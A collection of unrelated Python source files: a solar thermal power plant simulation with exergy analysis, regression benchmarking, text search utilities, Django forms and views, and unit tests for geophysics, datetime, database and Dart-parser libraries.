c41 = Connection(m2, 'out1', hppre1, 'in1', label='41')
c42 = Connection(hppre1, 'out1', v2, 'in1', label='42')
c44 = Connection(v2, 'out1', fwt, 'in2', label='44')
c45 = Connection(sp3, 'out2', fwt, 'in3', label='45')
c46 = Connection(sp4, 'out2', lppre3, 'in1', label='46')
c47 = Connection(lppre3, 'out1', v3, 'in1', label='47')
# c47 = Connection(lppre3, 'out1', lppre3_sub, 'in1', label='47')
# c48 = Connection(lppre3_sub, 'out1', v3, 'in1', label='48')
c49 = Connection(v3, 'out1', m3, 'in1', label='49')
c50 = Connection(sp5, 'out2', m3, 'in2', label='50')
c51 = Connection(m3, 'out1', lppre2, 'in1', label='51')
c52 = Connection(lppre2, 'out1', v4, 'in1', label='52')
# c52 = Connection(lppre2, 'out1', lppre2_sub, 'in1', label='52')
# c53 = Connection(lppre2_sub, 'out1', v4, 'in1', label='53')
c54 = Connection(v4, 'out1', m4, 'in2', label='54')
c55 = Connection(sp6, 'out2', m4, 'in1', label='55')
c56 = Connection(m4, 'out1', lppre1, 'in1', label='56')
c57 = Connection(lppre1, 'out1', v5, 'in1', label='57')
# c57 = Connection(lppre1, 'out1', lppre1_sub, 'in1', label='57')
# c58 = Connection(lppre1_sub, 'out1', v5, 'in1', label='58')
c59 = Connection(v5, 'out1', m1, 'in2', label='59')
# components from subsystem
c32 = Connection(eco, 'out2', drum, 'in1', label='32')
c33 = Connection(drum, 'out1', eva, 'in2', label='33')
c34 = Connection(eva, 'out2', drum, 'in2', label='34')
c35 = Connection(drum, 'out2', sup, 'in2', label='35')
c73 = Connection(sup, 'out1', eva, 'in1', label='73')
c74 = Connection(eva, 'out1', eco, 'in1', label='74')
# cooling water
c60 = Connection(cond, 'out2', closer_cw, 'in1', label='60')
c61 = Connection(closer_cw, 'out1', ct, 'in1', label='61')
c62 = Connection(ct, 'out1', cwp, 'in1', label='62')
c63 = Connection(cwp, 'out1', cond, 'in2', label='63')
# cooling tower
c64 = Connection(air_in, 'out1', fan, 'in1', label='64')
c65 = Connection(fan, 'out1', ct, 'in2', label='65')
c66 = Connection(ct, 'out2', air_out, 'in1', label='66')
# parabolic trough cycle
c70 = Connection(pt, 'out1', closer_pt, 'in1', label='70')
c71 = Connection(closer_pt, 'out1', sp7, 'in1', label='71')
c72 = Connection(sp7, 'out1', sup, 'in1', label='72')
c75 = Connection(eco, 'out1', m5, 'in1', label='75')
c76 = Connection(sp7, 'out2', reh, 'in1', label='76')
c77 = Connection(reh, 'out1', m5, 'in2', label='77')
c78 = Connection(m5, 'out1', ptpump, 'in1', label='78')
c79 = Connection(ptpump, 'out1', pt, 'in1', label='79')
# add connections to network
SEGSvi.add_conns(
c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, c13, c14, c15, c16, c17,
c18, c19, c21, c23, c25, c26, c27, c29, c31, c32, c33, c34,
c35, c36, c37, c39, c40, c41, c42, c44, c45, c46, c47, c49, c50, c51,
c52, c54, c55, c56, c57, c59, c60, c61, c62, c63, c64, c65, c66,
c70, c71, c72, c73, c74, c75, c76, c77, c78, c79)
# power bus
power = Bus('total output power')
power.add_comps({'comp': hpt1, 'char': 0.97, 'base': 'component'},
{'comp': hpt2, 'char': 0.97, 'base': 'component'},
{'comp': lpt1, 'char': 0.97, 'base': 'component'},
{'comp': lpt2, 'char': 0.97, 'base': 'component'},
{'comp': lpt3, 'char': 0.97, 'base': 'component'},
{'comp': lpt4, 'char': 0.97, 'base': 'component'},
{'comp': lpt5, 'char': 0.97, 'base': 'component'},
{'comp': fwp, 'char': 0.95, 'base': 'bus'},
{'comp': condpump, 'char': 0.95, 'base': 'bus'},
{'comp': ptpump, 'char': 0.95, 'base': 'bus'},
{'comp': cwp, 'char': 0.95, 'base': 'bus'},
{'comp': fan, 'char': 0.95, 'base': 'bus'})
heat_input_bus = Bus('heat input')
heat_input_bus.add_comps({'comp': pt, 'base': 'bus'})
exergy_loss_bus = Bus('exergy loss')
exergy_loss_bus.add_comps({'comp': air_in, 'base': 'bus'}, {'comp': air_out})
SEGSvi.add_busses(power, heat_input_bus, exergy_loss_bus)
# component parameters
pt.set_attr(doc=0.95, aoi=0,
Tamb=25, A='var', eta_opt=0.73,
c_1=0.00496, c_2=0.000691, E=1000,
iam_1=1, iam_2=1)
ptpump.set_attr(eta_s=0.6)
eco.set_attr()
eva.set_attr(ttd_l=5)
sup.set_attr()
hpt1.set_attr(eta_s=0.8376)
hpt2.set_attr(eta_s=0.8463)
lpt1.set_attr(eta_s=0.8623)
lpt2.set_attr(eta_s=0.917)
lpt3.set_attr(eta_s=0.9352)
lpt4.set_attr(eta_s=0.88)
lpt5.set_attr(eta_s=0.6445)
cond.set_attr(pr1=1, pr2=0.9, ttd_u=5)
condpump.set_attr(eta_s=0.7)
fwp.set_attr(eta_s=0.7)
cwp.set_attr(eta_s=0.7)
ct.set_attr(pr1=0.95)
fan.set_attr(eta_s=0.6)
lppre1.set_attr(pr1=1, ttd_u=5)
lppre2.set_attr(pr1=1, ttd_u=5)
lppre3.set_attr(pr1=1, ttd_u=5)
hppre1.set_attr(pr1=1, ttd_u=5)
hppre2.set_attr(pr1=1, ttd_u=5)
lppre1_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
lppre2_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
lppre3_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
hppre1_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
hppre2_sub.set_attr(pr1=1, pr2=1, ttd_l=10)
# connection parameters
# parabolic trough cycle
c70.set_attr(fluid={'TVP1': 1, 'water': 0, 'air': 0}, T=390, p=23.304)
c76.set_attr(m=Ref(c70, 0.1284, 0))
c73.set_attr(p=22.753)
c74.set_attr(p=21.167)
c78.set_attr(p=20.34)
c79.set_attr(p=41.024)
# cooling water
c62.set_attr(fluid={'TVP1': 0, 'water': 1, 'air': 0}, T=30, p=pamb)
# cooling tower
c64.set_attr(fluid={'water': 0, 'TVP1': 0, 'air': 1}, p=pamb, T=Tamb)
c65.set_attr(p=pamb + 0.0005)
c66.set_attr(p=pamb, T=30)
# power cycle
c32.set_attr(Td_bp=-2)
c34.set_attr(x=0.5)
c1.set_attr(fluid={'water': 1, 'TVP1': 0, 'air': 0}, p=100, T=371)
# steam generator pressure values
c31.set_attr(p=103.56)
c35.set_attr(p=103.42)
# turbine pressure values
c3.set_attr(p=33.61, m=38.969)
c5.set_attr(p=18.58)
c7.set_attr(p=17.1, T=371)
c8.set_attr(p=7.98)
c10.set_attr(p=2.73)
c12.set_attr(p=0.96)
c14.set_attr(p=0.29)
# preheater pressure values
c19.set_attr(p=14.755)
c21.set_attr(p=9.9975, state='l')
c23.set_attr(p=8.7012, state='l')
c25.set_attr(state='l')
c27.set_attr(p=125)
c29.set_attr(p=112)
# condensation
c16.set_attr(p=0.08)
# feedwater tank
c26.set_attr(x=0)
# a stable solution is generated for parts of the network
SEGSvi.solve(mode='design')
# SEGSvi.save('SEGSvi')
# delete old connections and finalize model
SEGSvi.del_conns(c19, c21, c23, c27, c29, c37, c42, c47, c52, c57)
c19 = Connection(condpump, 'out1', lppre1_sub, 'in2', label='19')
c20 = Connection(lppre1_sub, 'out2', lppre1, 'in2', label='20')
c21 = Connection(lppre1, 'out2', lppre2_sub, 'in2', label='21')
c22 = Connection(lppre2_sub, 'out2', lppre2, 'in2', label='22')
c23 = Connection(lppre2, 'out2', lppre3_sub, 'in2', label='23')
c24 = Connection(lppre3_sub, 'out2', lppre3, 'in2', label='24')
c27 = Connection(fwp, 'out1', hppre1_sub, 'in2', label='27')
c28 = Connection(hppre1_sub, 'out2', hppre1, 'in2', label='28')
c29 = Connection(hppre1, 'out2', hppre2_sub, 'in2', label='29')
c30 = Connection(hppre2_sub, 'out2', hppre2, 'in2', label='30')
c37 = Connection(hppre2, 'out1', hppre2_sub, 'in1', label='37')
c38 = Connection(hppre2_sub, 'out1', v1, 'in1', label='38')
c42 = Connection(hppre1, 'out1', hppre1_sub, 'in1', label='42')
c43 = Connection(hppre1_sub, 'out1', v2, 'in1', label='43')
c47 = Connection(lppre3, 'out1', lppre3_sub, 'in1', label='47')
c48 = Connection(lppre3_sub, 'out1', v3, 'in1', label='48')
c52 = Connection(lppre2, 'out1', lppre2_sub, 'in1', label='52')
c53 = Connection(lppre2_sub, 'out1', v4, 'in1', label='53')
c57 = Connection(lppre1, 'out1', lppre1_sub, 'in1', label='57')
c58 = Connection(lppre1_sub, 'out1', v5, 'in1', label='58')
SEGSvi.add_conns(
c19, c20, c21, c22, c23, c24, c27, c28, c29, c30, c37, c38, c42, c43, c47,
c48, c52, c53, c57, c58)
# specification of missing parameters
c19.set_attr(p=14.755)
c21.set_attr(p=9.9975, state='l')
c23.set_attr(p=8.7012, state='l')
c27.set_attr(p=125)
c29.set_attr(p=112)
# solve final state
SEGSvi.solve(mode='design')
# print results to prompt and generate model documentation
SEGSvi.print_results()
fmt = {
'latex_body': True,
'include_results': True,
'HeatExchanger': {
'params': ['Q', 'ttd_l', 'ttd_u', 'pr1', 'pr2']},
'Condenser': {
'params': ['Q', 'ttd_l', 'ttd_u', 'pr1', 'pr2']},
'Connection': {
'p': {'float_fmt': '{:,.4f}'},
's': {'float_fmt': '{:,.4f}'},
'h': {'float_fmt': '{:,.2f}'},
'fluid': {'include_results': False}
},
'draft': False
}
document_model(SEGSvi, fmt=fmt)
# carry out exergy analysis
ean = ExergyAnalysis(SEGSvi, E_P=[power], E_F=[heat_input_bus], E_L=[exergy_loss_bus])
ean.analyse(pamb=pamb, Tamb=Tamb)
# print exergy analysis results to prompt
ean.print_results()
# generate Grassmann diagram
links, nodes = ean.generate_plotly_sankey_input()
fig = go.Figure(go.Sankey(
arrangement="snap",
node={
"label": nodes,
'pad': 11,
'color': 'orange'},
link=links))
fig.show()
|
from django.shortcuts import render
def index(request):
""" The view that will render the home page """
return render(request, '{{ cookiecutter.main_app }}/home.html', context={})
|
import amorf.datasets as ds
import amorf.problemTransformation as pt
import amorf.metrics as metrics
import numpy as np
from sklearn.model_selection import KFold
edm = ds.EDM().get_numpy()
rf1 = ds.RiverFlow1().get_numpy()
wq = ds.WaterQuality().get_numpy()
transCond = ds.TransparentConductors().get_numpy()
dataset_names = ['EDM', 'RF1', 'Water Quality', 'Transparent Conductors']
datasets = [edm, rf1, wq, transCond]
selectors = ['linear', 'kneighbors',
             'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
results_datasets = []
for dataset in datasets:
    all_results = []
for selector in selectors:
SM = pt.SingleTargetMethod(selector)
X = dataset[0]
y = dataset[1]
kf = KFold(n_splits=5, random_state=1, shuffle=True)
selector_results = []
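        # 5-fold CV with a fixed seed: fit the single-target wrapper on each
        # training split and score the held-out fold with the average relative
        # root mean squared error (aRRMSE).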
for train_index, test_index in kf.split(X):
prediction = SM.fit(
X[train_index], y[train_index]).predict(X[test_index])
result = metrics.average_relative_root_mean_squared_error(
prediction, y[test_index])
selector_results.append(result)
all_results.append(selector_results)
means_and_std = []
for result in all_results:
mean, std = np.mean(result), np.std(result)
means_and_std.append([mean, std])
results_datasets.append(means_and_std)
results_datasets = np.around(results_datasets,decimals=3)
dataset_counter = 0
output = ""
for dataset in results_datasets:
result_counter = 0
print(dataset_names[dataset_counter])
output += dataset_names[dataset_counter] + '\n\n'
dataset_counter += 1
for selector in dataset:
print(selectors[result_counter])
print("Mean\t\t\tStd Dev\n {} \t {}".format(selector[0], selector[1]))
output += selectors[result_counter] + '\n'
output += "Mean\t\t\tStd Dev\n {} \t {}\n".format(
selector[0], selector[1])
result_counter += 1
with open("SingleTarget_CV.txt", "w") as text_file:
text_file.write(output)
|
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import numpy as np
import math
from brightics.common.groupby import _function_by_group
from brightics.common.utils import check_required_parameters
from brightics.common.utils import get_default_from_parameters_if_required
from brightics.common.validation import validate, greater_than_or_equal_to, raise_error, require_param
from itertools import product
from brightics.common.exception import BrighticsFunctionException
def search(table, **params):
check_required_parameters(_search, params, ['table'])
params = get_default_from_parameters_if_required(params, _search)
param_validation_check = []
validate(*param_validation_check)
return _search(table, **params)
def search_user_dict(table, **params):
check_required_parameters(_search, params, ['table'])
params = get_default_from_parameters_if_required(params, _search)
param_validation_check = []
validate(*param_validation_check)
return _search(table, **params)
def _search(table, user_dict=pd.DataFrame(), input_cols=[], search_words=[], synonym_dict=[], main_operator='and'):
if len(search_words) == 0:
raise BrighticsFunctionException('0033', 'Search Words')
for search_word in search_words:
if search_word is None:
raise BrighticsFunctionException('0033', 'Search Words')
_table = table.copy()
filter_list = []
if len(input_cols) == 0:
validate(require_param('input_cols'))
for _list in product(input_cols, search_words):
c, od = _list
filter_list.append([c, od.strip('\'')])
_out_table = _table
filtered_set = set(_out_table.index)
cond = np.full(len(_table), True).tolist()
for _filter in filter_list:
cond = (cond) & (_table[_filter[0]].str.contains(_filter[1]))
_out_table = _table.loc[list(filtered_set.intersection(set(_table[cond].index)))]
if len(user_dict.index) != 0:
filter_list = []
additional_search_words = []
for i, key in enumerate(user_dict.iloc[:, 0]):
if key in search_words:
additional_search_words.extend([synonym.strip() for synonym in user_dict.iloc[:, 1][i].split(',')])
search_words = additional_search_words
# search_words = [user_dict['value'][i] for i, key in enumerate(user_dict['key']) if key in search_words]
for _list in product(input_cols, search_words):
c, od = _list
filter_list.append([c, od.strip('\'')])
filtered_set = set()
syno_cond = np.full(len(_table), False).tolist()
for _filter in filter_list:
syno_cond = (syno_cond) | (_table[_filter[0]].str.contains(_filter[1]))
syno_cond = syno_cond | cond
_out_table = _table.loc[list(filtered_set.union(set(_table[syno_cond].index)))]
return {'out_table': _out_table}
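# Illustrative sketch (added comment, not part of the original module; column and word
# names are hypothetical): with input_cols=['title', 'body'] and search_words=['apple', 'pear'],
# product() above yields [['title', 'apple'], ['title', 'pear'], ['body', 'apple'], ['body', 'pear']],
# and the AND-chained str.contains() masks keep only rows whose every listed column
# contains every search word.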
def search2(table, **params):
check_required_parameters(_search2, params, ['table'])
params = get_default_from_parameters_if_required(params, _search2)
param_validation_check = []
validate(*param_validation_check)
return _search2(table, **params)
def _collect_search_text(keywords, keyword_dict):
if keywords is None:
search_text = keyword_dict[keyword_dict.columns[0]].values
elif keyword_dict is None:
search_text = keywords
else:
search_text = np.concatenate([keywords, keyword_dict[keyword_dict.columns[0]]])
return list(set(search_text))
def _link_word_synonyms(word, synonyms):
if synonyms is not None:
parse_synonyms = [synonym.strip() for synonym in synonyms.split(",")]
parse_synonyms.insert(0, word)
return '|'.join(parse_synonyms)
return word
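# Illustrative sketch (added comment, not part of the original module; the words are
# hypothetical): _link_word_synonyms('car', 'auto, automobile') returns the regex
# alternation 'car|auto|automobile', which str.contains() later treats as an OR over
# the word and its synonyms.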
def _find_synonyms(search_text, synonym_dict):
columns = synonym_dict.columns
words = synonym_dict[columns[0]]
synonyms = synonym_dict[columns[1]]
for idx in range(len(synonym_dict)):
text = synonym_dict[columns[0]][idx]
if text in search_text:
search_idx = search_text.index(text)
search_text[search_idx] = _link_word_synonyms(words[idx], synonyms[idx])
return search_text
def _search2(table, input_cols, hold_cols=None, bool_search="or", keyword_dict=None, keywords=None, synonym_dict=None, remove_na="no"):
if keywords is None and keyword_dict is None:
raise ValueError('At least one of Search Words and User Dictionary must be included.')
input_table = table[input_cols]
if hold_cols is None:
hold_table = table.drop(input_cols, axis=1)
length_ht = len(table.columns) - len(input_cols)
else:
hold_table = table[hold_cols]
length_ht = len(hold_cols)
search_text = _collect_search_text(keywords, keyword_dict)
if synonym_dict is not None:
search_text = _find_synonyms(search_text, synonym_dict)
if bool_search == 'and':
expr = '(?=.*{})'
search_str = ''.join(expr.format(text) for text in search_text)
else:
search_str = '|'.join(search_text)
cond = input_table.stack().str.contains(search_str).unstack()
if remove_na == "any":
out_table = pd.concat([input_table[cond], hold_table], axis=1).dropna(thresh=len(input_cols) + length_ht).reset_index(drop=True)
elif remove_na == "all":
out_table = pd.concat([input_table[cond], hold_table], axis=1).dropna(thresh=length_ht + 1).reset_index(drop=True)
else:
out_table = pd.concat([input_table[cond], hold_table], axis=1)
return {'out_table': out_table}
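# Illustrative sketch (added comment, not part of the original module; the terms are
# hypothetical): for search_text=['foo', 'bar'], bool_search='and' builds the lookahead
# pattern '(?=.*foo)(?=.*bar)' (a cell must contain both terms), while the default OR
# case builds 'foo|bar' (a cell may contain either term); the pattern is then applied
# cell-wise via stack().str.contains().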
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# Test functions
import unittest
import numpy as np
from SimPEG import tests, mkvc
from SimPEG.electromagnetics import natural_source as nsem
from scipy.constants import mu_0
TOLr = 5e-2
TOL = 1e-4
FLR = 1e-20 # "zero", so if residual below this --> pass regardless of order
CONDUCTIVITY = 1e1
MU = mu_0
# Test the Jvec derivative
def DerivJvecTest(inputSetup, comp="All", freq=False, expMap=True):
(M, freqs, sig, sigBG, rx_loc) = inputSetup
survey, simulation = nsem.utils.test_utils.setupSimpegNSEM_ePrimSec(
inputSetup, comp=comp, singleFreq=freq, expMap=expMap
)
print("Using {0} solver for the simulation".format(simulation.Solver))
print(
"Derivative test of Jvec for eForm primary/secondary for {} comp at {}\n".format(
comp, survey.freqs
)
)
# simulation.mapping = Maps.ExpMap(simulation.mesh)
# simulation.sigmaPrimary = np.log(sigBG)
x0 = np.log(sigBG)
# cond = sig[0]
# x0 = np.log(np.ones(simulation.mesh.nC)*cond)
# simulation.sigmaPrimary = x0
# if True:
# x0 = x0 + np.random.randn(simulation.mesh.nC)*cond*1e-1
survey = simulation.survey
def fun(x):
return simulation.dpred(x), lambda x: simulation.Jvec(x0, x)
return tests.checkDerivative(fun, x0, num=3, plotIt=False, eps=FLR)
def DerivProjfieldsTest(inputSetup, comp="All", freq=False):
survey, simulation = nsem.utils.test_utils.setupSimpegNSEM_ePrimSec(
inputSetup, comp, freq
)
print("Derivative test of data projection for eFormulation primary/secondary\n")
# simulation.mapping = Maps.ExpMap(simulation.mesh)
# Initate things for the derivs Test
src = survey.source_list[0]
np.random.seed(1983)
u0x = np.random.randn(survey.mesh.nE) + np.random.randn(survey.mesh.nE) * 1j
u0y = np.random.randn(survey.mesh.nE) + np.random.randn(survey.mesh.nE) * 1j
u0 = np.vstack((mkvc(u0x, 2), mkvc(u0y, 2)))
f0 = simulation.fieldsPair(survey.mesh, survey)
# u0 = np.hstack((mkvc(u0_px,2),mkvc(u0_py,2)))
f0[src, "e_pxSolution"] = u0[: len(u0) / 2] # u0x
f0[src, "e_pySolution"] = u0[len(u0) / 2 : :] # u0y
def fun(u):
f = simulation.fieldsPair(survey.mesh, survey)
f[src, "e_pxSolution"] = u[: len(u) / 2]
f[src, "e_pySolution"] = u[len(u) / 2 : :]
return (
rx.eval(src, survey.mesh, f),
lambda t: rx.evalDeriv(src, survey.mesh, f0, mkvc(t, 2)),
)
return tests.checkDerivative(fun, u0, num=3, plotIt=False, eps=FLR)
class NSEM_DerivTests(unittest.TestCase):
def setUp(self):
pass
# Do a derivative test of Jvec
def test_derivJvec_impedanceAll(self):
self.assertTrue(
DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "Imp", 0.1)
)
def test_derivJvec_zxxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "xx", 0.1))
def test_derivJvec_zxyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "xy", 0.1))
def test_derivJvec_zyxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "yx", 0.1))
def test_derivJvec_zyyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "yy", 0.1))
# Tipper
def test_derivJvec_tipperAll(self):
self.assertTrue(
DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "Tip", 0.1)
)
def test_derivJvec_tzxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "zx", 0.1))
def test_derivJvec_tzyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "zy", 0.1))
if __name__ == "__main__":
unittest.main()
|
from django.db import connection
from . import PostgreSQLTestCase
try:
from django.contrib.postgres.signals import get_hstore_oids, get_citext_oids
except ImportError:
    pass  # psycopg2 isn't installed.
class OIDTests(PostgreSQLTestCase):
def assertOIDs(self, oids):
self.assertIsInstance(oids, tuple)
self.assertGreater(len(oids), 0)
self.assertTrue(all(isinstance(oid, int) for oid in oids))
def test_hstore_cache(self):
with self.assertNumQueries(0):
get_hstore_oids(connection.alias)
def test_citext_cache(self):
with self.assertNumQueries(0):
get_citext_oids(connection.alias)
def test_hstore_values(self):
oids, array_oids = get_hstore_oids(connection.alias)
self.assertOIDs(oids)
self.assertOIDs(array_oids)
def test_citext_values(self):
oids = get_citext_oids(connection.alias)
self.assertOIDs(oids)
|
# coding=utf-8
from django import forms
from django.contrib.auth.forms import UserChangeForm
from models import Customer, CustomerSetting, ACTION_TYPE
from captcha.fields import CaptchaField, CaptchaTextInput
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext_lazy as _
class CustomerForm(UserChangeForm):
class Meta:
model = Customer
fields = ['company', 'email', 'contact', 'mobile', 'emergency_contact', 'emergency_mobile', 'password']
class CustomerSettingForm(forms.ModelForm):
class Meta:
model = CustomerSetting
exclude = ['customer']
class CustomerRelaySettingForm(forms.ModelForm):
class Meta:
model = CustomerSetting
fields = ['bounce', 'notice', 'bigmail']
class CustomerCollectSettingForm(forms.ModelForm):
def clean_spamrpt_sendtime(self):
data = self.cleaned_data['spamrpt_sendtime']
b = self.data.get('is_spamrpt_sendtime', '')
if not b:
return None
if b and not data:
raise forms.ValidationError(u"请设置隔离报告发送时间")
return data
class Meta:
model = CustomerSetting
exclude = ['customer', 'bounce', 'can_view_mail', 'bigmail', 'notice', 'transfer_max_size', 'replace_sender',
'check_autoreply', 'service_notice', 'interval_spamrpt']
class MyAuthenticationForm(AuthenticationForm):
captcha = CaptchaField()
def clean(self):
super(MyAuthenticationForm, self).clean()
user_cache = self.user_cache
user_type = user_cache.type
status = user_cache.status
gateway_status = user_cache.gateway_status
if (user_type in ['relay', 'all'] and status != 'disabled') or (
user_type in ['collect', 'all'] and gateway_status != 'disabled'):
return self.cleaned_data
raise forms.ValidationError(
            _(u'Incorrect password or the account has been disabled!'),
code='invalid_login',
params={'username': self.username_field.verbose_name},
)
class OperateLogSearchForm(forms.Form):
    date_start = forms.DateField(label=_(u'Start date'), required=False,
widget=forms.DateInput(
attrs={'class': 'dateinput', 'readonly': 'readonly', 'size': 12}))
    date_end = forms.CharField(label=_(u'End date'), required=False,
widget=forms.DateInput(
attrs={'class': 'dateinput ', 'readonly': 'readonly', 'size': 12}))
    action = forms.ChoiceField(label=_(u'Action type'), required=False, choices=ACTION_TYPE)
|
import pickle
from copy import deepcopy
from datetime import date
from datetime import datetime
from datetime import time
from datetime import timedelta
import pytest
import pendulum
from pendulum import timezone
from pendulum.tz.timezone import Timezone
@pytest.fixture
def p():
return pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
@pytest.fixture
def p1(p):
return p.in_tz("America/New_York")
@pytest.fixture
def dt():
tz = timezone("Europe/Paris")
return tz.convert(datetime(2016, 8, 27, 12, 34, 56, 123456))
def test_timetuple(p, dt):
assert dt.timetuple() == p.timetuple()
def test_utctimetuple(p, dt):
assert dt.utctimetuple() == p.utctimetuple()
def test_date(p, dt):
assert p.date() == dt.date()
def test_time(p, dt):
assert p.time() == dt.time()
def test_timetz(p, dt):
assert p.timetz() == dt.timetz()
def test_astimezone(p, dt, p1):
assert p.astimezone(p1.tzinfo) == dt.astimezone(p1.tzinfo)
def test_ctime(p, dt):
assert p.ctime() == dt.ctime()
def test_isoformat(p, dt):
assert p.isoformat() == dt.isoformat()
def test_utcoffset(p, dt):
assert p.utcoffset() == dt.utcoffset()
def test_tzname(p, dt):
assert p.tzname() == dt.tzname()
def test_dst(p, dt):
assert p.dst() == dt.dst()
def test_toordinal(p, dt):
assert p.toordinal() == dt.toordinal()
def test_weekday(p, dt):
assert p.weekday() == dt.weekday()
def test_isoweekday(p, dt):
assert p.isoweekday() == dt.isoweekday()
def test_isocalendar(p, dt):
assert p.isocalendar() == dt.isocalendar()
def test_fromtimestamp():
p = pendulum.DateTime.fromtimestamp(0, pendulum.UTC)
dt = datetime.fromtimestamp(0, pendulum.UTC)
assert p == dt
def test_utcfromtimestamp():
p = pendulum.DateTime.utcfromtimestamp(0)
dt = datetime.utcfromtimestamp(0)
assert p == dt
def test_fromordinal():
assert datetime.fromordinal(730120) == pendulum.DateTime.fromordinal(730120)
def test_combine():
p = pendulum.DateTime.combine(date(2016, 1, 1), time(1, 2, 3, 123456))
dt = datetime.combine(date(2016, 1, 1), time(1, 2, 3, 123456))
assert p == dt
def test_hash(p, dt):
assert hash(p) == hash(dt)
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
dt2 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
dt3 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="America/Toronto")
assert hash(dt1) == hash(dt2)
assert hash(dt1) != hash(dt3)
def test_pickle():
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert dt1 == dt2
def test_pickle_with_integer_tzinfo():
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz=0)
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert dt1 == dt2
def test_proper_dst():
dt = pendulum.datetime(1941, 7, 1, tz="Europe/Amsterdam")
assert dt.dst() == timedelta(0, 6000)
def test_deepcopy():
dt = pendulum.datetime(1941, 7, 1, tz="Europe/Amsterdam")
assert dt == deepcopy(dt)
def test_pickle_timezone():
dt1 = pendulum.timezone("Europe/Amsterdam")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert isinstance(dt2, Timezone)
dt1 = pendulum.timezone("UTC")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert isinstance(dt2, Timezone)
|
from collections import namedtuple
from string import Template
from typing import Any
import cupy
import torch
__all__ = ["Stream", "get_dtype_str", "load_kernel"]
Stream = namedtuple("Stream", ["ptr"])
def get_dtype_str(t: torch.Tensor) -> str:
if isinstance(t, torch.cuda.FloatTensor):
return "float"
elif isinstance(t, torch.cuda.DoubleTensor):
return "double"
    raise NotImplementedError(f"Tensor type {t} not supported")
@cupy.util.memoize(for_each_device=True)
def load_kernel(kernel_name: Any, code: str, **kwargs) -> Any:
code = Template(code).substitute(**kwargs)
kernel_code = cupy.cuda.compile_with_cache(code)
return kernel_code.get_function(kernel_name)
CUDA_NUM_THREADS = 1024
def GET_BLOCKS(N: int) -> int:
"""
:param N:
:type N:
:return:
:rtype:
"""
return (N + CUDA_NUM_THREADS - 1) // CUDA_NUM_THREADS
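# Illustrative worked example (added comment, not part of the original module): with
# CUDA_NUM_THREADS = 1024, GET_BLOCKS(2500) == (2500 + 1023) // 1024 == 3, i.e. three
# blocks of 1024 threads are enough to cover all 2500 elements.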
kernel_loop = """
#define CUDA_KERNEL_LOOP(i, n) \
for (int i = blockIdx.x * blockDim.x + threadIdx.x; \
i < (n); \
i += blockDim.x * gridDim.x)
"""
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
logger = logging.getLogger(__name__)
def exception_caught_in_background_thread(e):
"""
Function which handled exceptions that are caught in background thread. This is
typically called from the callback thread inside the pipeline. These exceptions
need special handling because callback functions are typically called inside a
non-application thread in response to non-user-initiated actions, so there's
nobody else to catch them.
This function gets called from inside an arbitrary thread context, so code that
runs from this function should be limited to the bare minumum.
:param Error e: Exception object raised from inside a background thread
"""
# @FUTURE: We should add a mechanism which allows applications to receive these
# exceptions so they can respond accordingly
logger.error(msg="Exception caught in background thread. Unable to handle.", exc_info=e)
|
import unittest
from dart.globals import ImportParser, PartOfParser
class TestImport(unittest.TestCase):
def test_import(self):
parser = ImportParser()
elem = parser.parse("import 'package:flutter/widgets.dart';", 0)
self.assertEqual(elem.content(), "import 'package:flutter/widgets.dart';")
self.assertEqual(elem.target.content(), "'package:flutter/widgets.dart'")
self.assertEqual(elem.alias, None)
elem = parser.parse("import 'package:html/parser.dart' as parser;", 0)
self.assertEqual(elem.content(), "import 'package:html/parser.dart' as parser;")
self.assertEqual(elem.target.content(), "'package:html/parser.dart'")
self.assertEqual(elem.alias.content(), "parser")
elem = parser.parse("import \"package:flutter/widgets.dart\";", 0)
self.assertEqual(elem.content(), "import \"package:flutter/widgets.dart\";")
self.assertEqual(elem.target.content(), "\"package:flutter/widgets.dart\"")
self.assertEqual(elem.alias, None)
elem = parser.parse("import \"package:html/parser.dart\" as parser;", 0)
self.assertEqual(elem.content(), "import \"package:html/parser.dart\" as parser;")
self.assertEqual(elem.target.content(), "\"package:html/parser.dart\"")
self.assertEqual(elem.alias.content(), "parser")
def test_part_of(self):
parser = PartOfParser()
elem = parser.parse("part 'parser/border.dart';", 0)
self.assertEqual(elem.content(), "part 'parser/border.dart';")
